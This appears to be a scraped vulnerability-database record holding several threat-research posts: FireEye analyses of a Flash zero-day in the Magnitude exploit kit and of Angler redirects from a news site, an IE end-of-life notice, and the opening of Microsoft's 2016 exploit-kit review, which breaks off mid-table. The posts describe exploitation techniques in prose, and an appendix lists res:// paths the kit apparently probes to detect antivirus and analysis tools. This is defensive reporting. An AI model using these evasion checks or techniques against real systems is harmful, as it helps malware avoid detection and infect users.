JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. 
His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 
\nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky 
Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky 
Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 
\nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T12:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-1019"], "modified": "2016-04-07T12:30:00", "id": "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "##### **INTRODUCTION**\n\nFireEye Labs recently spotted a 2011 article on cybercrime from the news site theguardian[.]com that redirects users to the Angler Exploit Kit. Successful exploitation by Angler resulted in a malware infection for readers of the article. A spokesperson for the guardian[.]com responded that they \"are aware of FireEye's claims and are working to rectify the issue in question as soon as possible.\"\n\nFireEye Labs first detected the activity on Dec. 1, 2015. Ironically, the affected article was titled \u201cCybercrime: is it out of control?\u201d and covered various aspects of cybercrime. As it turns out, visiting the page shown in Figure 1 and Figure 2 silently redirected browsers to an Angler Exploit Kit landing page.\n\n\n\nFigure 1. Article URL\n\n\n\nFigure 2. Image from main page, highlighting cybercrime issues\n\nThe article loaded several other pages and links, including links for syndication shown in Figure 3 and Figure 4.\n\n\n\nFigure 3. Sharing and syndication links\n\n\n\nFigure 4. Syndication page URL\n\nWhen the syndication link is loaded in the background, readers are eventually redirected to Angler\u2019s landing page via injected HTML that crafts the request to the Angler landing page.\n\nVisible in the HTML response is the script that would craft the URL to the Angler landing page. (Figure 5)\n\n\n\nFigure 5. Injected script that loads the Angler landing page\n\nOnce loaded, the page would execute the embedded script and redirect the reader to the Angler landing page located at the URL in Figure 6:\n\n\n\nFigure 6. 
Angler landing page URL\n\nThis redirect resulted in a new GET request (Figure 7) that loaded the landing page (Figure 8) and set up the exploitation stage.\n\n\n\n\n\nFigure 7. Angler GET request, syndication link URL visible in Referrer field\n\n##### **EXPLOITS**\n\nOld exploits never die\u2026\n\nThe use of an OLE Automation vulnerability exploited through VBScript, along with evidence of potential Flash exploitation, can be observed in this particular attack.\n\nAngler unconditionally attempted to exploit a popular vulnerability: CVE-2014-6332. This is a memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation, which can be triggered through VBScript with Internet Explorer as seen below.\n\nThe vulnerable code resided in OLEAUT32!SafeArrayRedim, where the original size of an array was not properly restored when an \u201cOut of memory\u201d error occurred while resizing an array. This issue allowed for out-of-bounds memory access. In this attack the exploit was based on a publicly available PoC, and techniques from that PoC were used to attempt arbitrary code execution. Figure 8 shows Angler\u2019s obfuscated version of the CVE-2014-6332 vulnerability trigger.\n\n\n\nFigure 8. Angler landing page contents\n\nAngler also unconditionally embedded a Flash object in the page at runtime. The FlashVars included crypto constants for D-H (g, u), and a URL to the payload (exec). Angler\u2019s server then decided whether to serve a Flash exploit, presumably based on information in the request like x-flash-version.\n\nThe de-obfuscated object tag used to embed Flash movie files can be seen below in Figure 9:\n\n\n\nFigure 9. Angler CVE-2014-6332 triggering function\n\nIt was common practice for Angler to decide which, if any, Flash exploit to deliver to the target at runtime. Most recently, we observed Angler delivering a number of high-profile exploits. 
These included, but were not limited to, CVE-2015-5122, CVE-2015-5560, and CVE-2015-7645.\n\nTypically, prior to conducting any exploitation on the system, Angler Exploit Kit attempted to detect whether Anti-Virus products or analysis tools are present. If Angler determined that such an object is present, it changed its behavior. For example, if Angler detected one such product, it invalidated its D-H parameters and the attack silently failed (Figure 10).\n\n\n\nFigure 10. Tag for Flash object from JavaScript\n\nAnother change bound to the presence of AV/analysis objects determines whether or not the malicious VBScript exploit is loaded. If detected, a non-malicious VBScript will be used instead. Or, it would if they remembered to unescape the string (Figure 11):\n\n\n\nFigure 11. Return appropriate result based on the AV vendor check\n\nThis attack was discovered in FireEye Dynamic Threat Intelligence. Additional syndication URLs are also redirecting to Angler (Figure 12):\n\n\n\nFigure 12. 
Constructing VBScript depending upon the presence of AV/analysis objects\n\nVisitors to the site are encouraged to use caution to avoid potentially becoming infected.\n", "edition": 2, "cvss3": {}, "published": "2015-12-09T12:00:00", "type": "fireeye", "title": "Cybercrime News Results In Cybercrime Blues", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-5122", "CVE-2015-5560", "CVE-2015-7645"], "modified": "2015-12-09T12:00:00", "id": "FIREEYE:50656CA8D413ED51CDE771F0BAB863B5", "href": "https://www.fireeye.com/blog/threat-research/2015/12/cybercrime-news.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. 
If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in the right direction for the Microsoft teams because they allow for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. 
Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear | CVE | Affects \n---|---|--- \n2014 | [CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) | IE 9 and 10 \n2014 | [CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>) | IE 6 to 11 \n2015 | [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) | IE 10 and 11 \n2015 | [CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>) | IE 7 to 11 \n \nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. 
These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\\(v=vs.85\\).aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\\(v=vs.85\\).aspx>), which have been used to [exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. 
The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "edition": 2, "cvss3": {}, "published": "2016-01-12T14:49:00", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0322", "CVE-2015-2502", "CVE-2015-2419", "CVE-2014-1776"], "modified": "2016-01-12T14:49:00", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. 
Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones; 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browsers and software remains the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. 
Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. 
United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become a reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continues to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware families of 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. 
With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate with which exploit kits integrate exploits for newly disclosed vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt to continually improve their tools. 
One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe previously introduced stronger exploit mitigation, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted product** | **Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)) | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | 